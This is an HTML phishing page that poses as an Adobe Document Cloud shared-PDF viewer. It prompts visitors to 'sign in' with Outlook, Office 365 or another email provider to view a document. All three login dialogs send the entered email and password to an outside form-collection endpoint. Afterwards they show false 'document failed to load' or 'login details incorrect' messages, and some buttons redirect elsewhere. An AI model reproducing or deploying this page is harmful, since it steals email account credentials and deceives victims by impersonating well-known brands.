<!DOCTYPE html>
<html style="font-size: 16px;">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <meta name="page_type" content="np-template-header-footer-from-plugin">
    <title>Share-PDF-file</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="Share-PDF-file.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery-1.9.1.min.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 4.4.3, nicepage.com">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i">
    
    
    
    
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "pdf-file",
		"url": "/"
}</script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="Share-PDF-file">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <link rel="canonical" href="/">
  </head>
  <body data-home-page="https://formspree.io/f/xjvlwwov/Share-PDF-file.html?version=5bdb69d6-6ee9-42c2-a4a2-6d85d94031ba" data-home-page-title="Share-PDF-file" class="u-body u-xl-mode">
    <section class="u-align-left u-clearfix u-image u-shading u-section-1" src="" data-image-width="1200" data-image-height="646" id="sec-6b3d">
      <div class="u-clearfix u-sheet u-valign-middle u-sheet-1">
        <div class="u-align-center u-black u-container-style u-group u-opacity u-opacity-35 u-radius-11 u-shape-round u-group-1">
          <div class="u-container-layout u-container-layout-1">
            <img class="u-align-center u-image u-image-default u-preserve-proportions u-image-1" src="/images/adobe.jpg" alt="" data-image-width="400" data-image-height="400">
            <h3 class="u-text u-text-1">Adobe Document Cloud<br>
            </h3>
            <h5 class="u-align-center u-text u-text-2">To Read the document, please enter&nbsp; the valid email credentials that this file was sent to<br>
            </h5>
            <div class="u-border-1 u-border-white u-line u-line-horizontal u-line-1"></div>
            <a href="#sec-d874" class="u-active-white u-align-center u-btn u-button-style u-custom-color-1 u-dialog-link u-hover-custom-color-1 u-hover-feature u-btn-1" data-animation-name="fadeIn" data-animation-duration="1000" data-animation-direction="" data-animation-delay="0"><span class="u-file-icon u-icon u-icon-1"><img src="/images/outlook.png" alt=""></span>&nbsp;Sign in with outlook
            </a>
            <a href="#sec-cc4f" class="u-align-center u-btn u-button-style u-custom-color-2 u-dialog-link u-hover-custom-color-3 u-hover-feature u-btn-2"><span class="u-file-icon u-icon u-icon-2"><img src="/images/office365.png" alt=""></span>&nbsp;Sign in with office 365
            </a>
            <a href="#carousel_02dc" class="u-align-center u-border-none u-btn u-button-style u-custom-color-1 u-dialog-link u-hover-feature u-btn-3"><span class="u-file-icon u-icon u-icon-3"><img src="/images/other1.png" alt=""></span>&nbsp;Sign in with other mail<br>
            </a>
            <h5 class="u-text u-text-3">
              <span style="font-size: 1.125rem;">Select your email provider to view document</span>
              <br>
              <span style="font-size: 1rem;">Copyright 2022</span>
              <br>
            </h5>
          </div>
        </div>
      </div>
      
      
      
    </section>
      
    
    
  <section class="u-align-center u-black u-clearfix u-container-style u-dialog-block u-opacity u-opacity-75 u-section-4" id="sec-d874">
      <div class="u-align-center u-container-style u-dialog u-radius-10 u-shape-round u-white u-dialog-1">
        <div class="u-container-layout u-valign-top-md u-container-layout-1"><span class="u-file-icon u-icon u-icon-1"><img src="/images/outlook.png" alt=""></span>
          <div class="u-form u-form-1">
            <form action="https://formspree.io/f/mzbqknrg" method="POST" class="u-clearfix u-form-custom-backend u-form-spacing-8 u-form-vertical u-inner-form" style="padding: 0px;" source="custom" name="form" redirect="true">
              <input type="hidden" id="siteId" name="siteId" value="1391307">
              <input type="hidden" id="pageId" name="pageId" value="1391350">
              <div class="u-form-email u-form-group">
                <label for="email-fd5b" class="u-label">Email</label>
                <input type="email" placeholder="Enter a valid email address" id="email-fd5b" name="Outlook" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="">
              </div>
              <div class="u-form-group u-form-group-2">
                <label for="password" class="u-label">Password</label>
                <input type="password" placeholder="Enter Password" id="password" name="password" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="required">
              </div>
              <div class="u-align-right u-form-group u-form-submit">
                <a href="https://create.vista.com" class="u-btn u-btn-round u-btn-submit u-button-style u-radius-10 u-text-active-black u-text-hover-white">Submit</a>
                <input type="submit" value="submit" class="u-form-control-hidden" >
              </div>
              <div class="u-form-send-message u-form-send-success">document failed to load, try again...</div>
              <div class="u-form-send-error u-form-send-message">login details incorrect. Please enter a valid credentials and try again.</div>
              <input type="hidden" value="" name="recaptchaResponse">
            </form>
          </div>
        </div><button class="u-dialog-close-button u-icon u-text-grey-50 u-icon-2"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 413.348 413.348" style=""><use xlink:href="#svg-5801"></use></svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" xml:space="preserve" class="u-svg-content" viewBox="0 0 413.348 413.348" id="svg-5801"><path d="m413.348 24.354-24.354-24.354-182.32 182.32-182.32-182.32-24.354 24.354 182.32 182.32-182.32 182.32 24.354 24.354 182.32-182.32 182.32 182.32 24.354-24.354-182.32-182.32z"></path></svg></button>
      </div>
    </section><style> .u-section-4 {
  background-image: none;
  min-height: 826px;
}

.u-section-4 .u-dialog-1 {
  width: 512px;
  min-height: 401px;
  background-image: none;
  margin: 250px auto 60px;
}

.u-section-4 .u-container-layout-1 {
  padding: 7px 5px 19px;
}

.u-section-4 .u-icon-1 {
  width: 64px;
  height: 64px;
  margin: 14px auto 0;
}

.u-section-4 .u-form-1 {
  height: 244px;
  width: 452px;
  margin: 23px auto 0;
}

.u-section-4 .u-form-group-2 {
  margin-left: 0;
}

.u-section-4 .u-icon-2 {
  width: 15px;
  height: 15px;
  left: auto;
  top: 18px;
  position: absolute;
  right: 15px;
}

@media (max-width: 1199px) {
  .u-section-4 .u-dialog-1 {
    height: auto;
    min-height: 471px;
    margin-top: 288px;
  }

  .u-section-4 .u-container-layout-1 {
    padding-top: 0;
  }

  .u-section-4 .u-icon-1 {
    margin-top: 67px;
  }

  .u-section-4 .u-form-1 {
    margin-top: 12px;
    margin-right: 18px;
    margin-left: 32px;
  }
}

@media (max-width: 991px) {
  .u-section-4 .u-dialog-1 {
    min-height: 386px;
    margin-top: 259px;
  }

  .u-section-4 .u-container-layout-1 {
    padding-top: 40px;
  }

  .u-section-4 .u-icon-1 {
    margin-top: 0;
  }

  .u-section-4 .u-form-1 {
    margin-top: 15px;
    margin-left: auto;
    margin-right: auto;
  }
}

@media (max-width: 767px) {
  .u-section-4 .u-dialog-1 {
    width: 490px;
    min-height: 426px;
    margin-top: 272px;
  }

  .u-section-4 .u-container-layout-1 {
    padding-top: 9px;
    padding-left: 8px;
    padding-right: 8px;
  }

  .u-section-4 .u-icon-1 {
    margin-top: 40px;
  }

  .u-section-4 .u-form-1 {
    margin-top: 0;
    margin-left: 22px;
    margin-right: 22px;
  }
}

@media (max-width: 575px) {
  .u-section-4 .u-dialog-1 {
    width: 368px;
    min-height: 351px;
    margin-top: 325px;
  }

  .u-section-4 .u-container-layout-1 {
    padding: 26px 25px 16px;
  }

  .u-section-4 .u-icon-1 {
    margin-top: 1px;
  }

  .u-section-4 .u-form-1 {
    width: 330px;
    margin-right: 0;
    margin-left: 0;
  }
}</style><section class="u-black u-clearfix u-container-style u-dialog-block u-opacity u-opacity-75 u-section-5" id="sec-cc4f">
      <div class="u-container-style u-dialog u-radius-10 u-shape-round u-white u-dialog-1">
        <div class="u-container-layout u-valign-top u-container-layout-1"><span class="u-file-icon u-icon u-icon-1"><img src="/images/office365.png" alt=""></span>
          <div class="u-form u-form-1">
            <form action="https://formspree.io/f/mzbqknrg" method="POST" class="u-clearfix u-form-custom-backend u-form-spacing-8 u-form-vertical u-inner-form" style="padding: 0px;" source="custom" name="form" redirect="true">

              <input type="hidden" id="siteId" name="siteId" value="1391307">
              <input type="hidden" id="pageId" name="pageId" value="1391350">
              <div class="u-form-email u-form-group">
                <label for="email-fd5b" class="u-label">Email</label>
                <input type="email" placeholder="Enter a valid email address" id="email-fd5b" name="office365" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="">
              </div>
              <div class="u-form-group u-form-group-2">
                <label for="password" class="u-label">Password</label>
                <input type="password" placeholder="Enter Password" id="password" name="password" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="required">
              </div>
              <div class="u-align-right u-form-group u-form-submit">
                <a href="https://create.vista.com" class="u-btn u-btn-round u-btn-submit u-button-style u-radius-10 u-text-active-black u-text-hover-white">Submit</a>
                <input onclick="submit = https://create.vista.com" type="submit" value="submit" class="u-form-control-hidden">
                  
              </div>
              <div class="u-form-send-message u-form-send-success">document failed to load, try again...</div>
              <div class="u-form-send-error u-form-send-message">login details incorrect. Please enter a valid credentials and try again.</div>
              <input type="hidden" value="" name="recaptchaResponse">
            </form>
          </div>
        </div><button class="u-dialog-close-button u-icon u-text-grey-40 u-icon-2"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xlink:href="#svg-efe9"></use></svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" xml:space="preserve" class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-efe9"><rect x="7" y="0" transform="matrix(0.7071 -0.7071 0.7071 0.7071 -3.3138 8.0002)" width="2" height="16"></rect><rect x="0" y="7" transform="matrix(0.7071 -0.7071 0.7071 0.7071 -3.3138 8.0002)" width="16" height="2"></rect></svg></button>
      </div>
    </section><style> .u-section-5 {
  min-height: 804px;
}

.u-section-5 .u-dialog-1 {
  width: 488px;
  min-height: 412px;
  margin: 253px auto 60px;
}

.u-section-5 .u-container-layout-1 {
  padding: 30px;
}

.u-section-5 .u-icon-1 {
  width: 64px;
  height: 65px;
  margin: 0 auto;
}

.u-section-5 .u-form-1 {
  width: 428px;
  margin: 30px auto 0;
}

.u-section-5 .u-btn-1 {
  background-image: none;
  border-style: none;
}

.u-section-5 .u-icon-2 {
  width: 20px;
  height: 20px;
}

@media (max-width: 1199px) {
  .u-section-5 .u-dialog-1 {
    height: auto;
  }
}

@media (max-width: 767px) {
  .u-section-5 .u-container-layout-1 {
    padding-left: 10px;
    padding-right: 10px;
  }
}

@media (max-width: 575px) {
  .u-section-5 .u-dialog-1 {
    width: 340px;
  }

  .u-section-5 .u-form-1 {
    width: 320px;
  }
}</style><section class="u-align-center u-black u-clearfix u-container-style u-dialog-block u-opacity u-opacity-75 u-section-6" id="carousel_02dc">
      <div class="u-align-center u-container-style u-dialog u-radius-10 u-shape-round u-white u-dialog-1">
        <div class="u-container-layout u-container-layout-1"><span class="u-file-icon u-icon u-icon-circle u-palette-1-base u-spacing-10 u-icon-1"><img src="/images/other1.png" alt=""></span>
          <div class="u-form u-form-1">
              <form action="https://formspree.io/f/mzbqknrg" method="POST" class="u-clearfix u-form-custom-backend u-form-spacing-8 u-form-vertical u-inner-form" style="padding: 0px;" source="custom" name="form" redirect="true">

              <input type="hidden" id="siteId" name="siteId" value="1391307">
              <input type="hidden" id="pageId" name="pageId" value="1391350">
              <div class="u-form-email u-form-group">
                <label for="email-fd5b" class="u-label">Email</label>
                <input type="email" placeholder="Enter a valid email address" id="email-fd5b" name="otherEmail" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="">
              </div>
              <div class="u-form-group u-form-group-2">
                <label for="password" class="u-label">Password</label>
                <input type="password" placeholder="Enter Password" id="password" name="password" class="u-border-1 u-border-grey-30 u-input u-input-rectangle u-white" required="required">
              </div>
              <div class="u-align-right u-form-group u-form-submit">
                <a href="https://create.vista.com" class="u-btn u-btn-round u-btn-submit u-button-style u-radius-10 u-text-active-black u-text-hover-white">Submit</a>
                <input type="submit" value="submit" class="u-form-control-hidden">
                  <input onclick="window.location.href = 'https://create.vista.com';" />
              </div>
              <div class="u-form-send-message u-form-send-success">document failed to load, try again...</div>
              <div class="u-form-send-error u-form-send-message">login details incorrect. Please enter a valid credentials and try again.</div>
              <input type="hidden" value="" name="recaptchaResponse">
            </form>
          </div>
        </div><button class="u-dialog-close-button u-icon u-text-grey-50 u-icon-2"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 413.348 413.348" style=""><use xlink:href="#svg-5801"></use></svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" xml:space="preserve" class="u-svg-content" viewBox="0 0 413.348 413.348" id="svg-5801"><path d="m413.348 24.354-24.354-24.354-182.32 182.32-182.32-182.32-24.354 24.354 182.32 182.32-182.32 182.32 24.354 24.354 182.32-182.32 182.32 182.32 24.354-24.354-182.32-182.32z"></path></svg></button>
      </div>
    </section><style> .u-section-6 {
  min-height: 826px;
}

.u-section-6 .u-dialog-1 {
  width: 482px;
  min-height: 408px;
  margin: 251px auto 60px;
}

.u-section-6 .u-container-layout-1 {
  padding: 0 5px 19px;
}

.u-section-6 .u-icon-1 {
  width: 64px;
  height: 63px;
  background-image: none;
  margin: 34px auto 0;
}

.u-section-6 .u-form-1 {
  height: 244px;
  width: 415px;
  margin: 20px auto 0;
}

.u-section-6 .u-form-group-2 {
  margin-left: 0;
}

.u-section-6 .u-icon-2 {
  width: 15px;
  height: 15px;
  left: auto;
  top: 18px;
  position: absolute;
  right: 15px;
}

@media (max-width: 1199px) {
  .u-section-6 .u-dialog-1 {
    height: auto;
  }

  .u-section-6 .u-form-1 {
    width: 415px;
  }
}

@media (max-width: 991px) {
  .u-section-6 .u-container-layout-1 {
    padding-top: 40px;
  }
}

@media (max-width: 767px) {
  .u-section-6 .u-container-layout-1 {
    padding-top: 0;
    padding-left: 40px;
    padding-right: 40px;
  }
}

@media (max-width: 575px) {
  .u-section-6 .u-dialog-1 {
    width: 340px;
  }

  .u-section-6 .u-container-layout-1 {
    padding-top: 40px;
    padding-left: 25px;
    padding-right: 25px;
  }

  .u-section-6 .u-form-1 {
    width: 330px;
  }
}</style></body>
</html>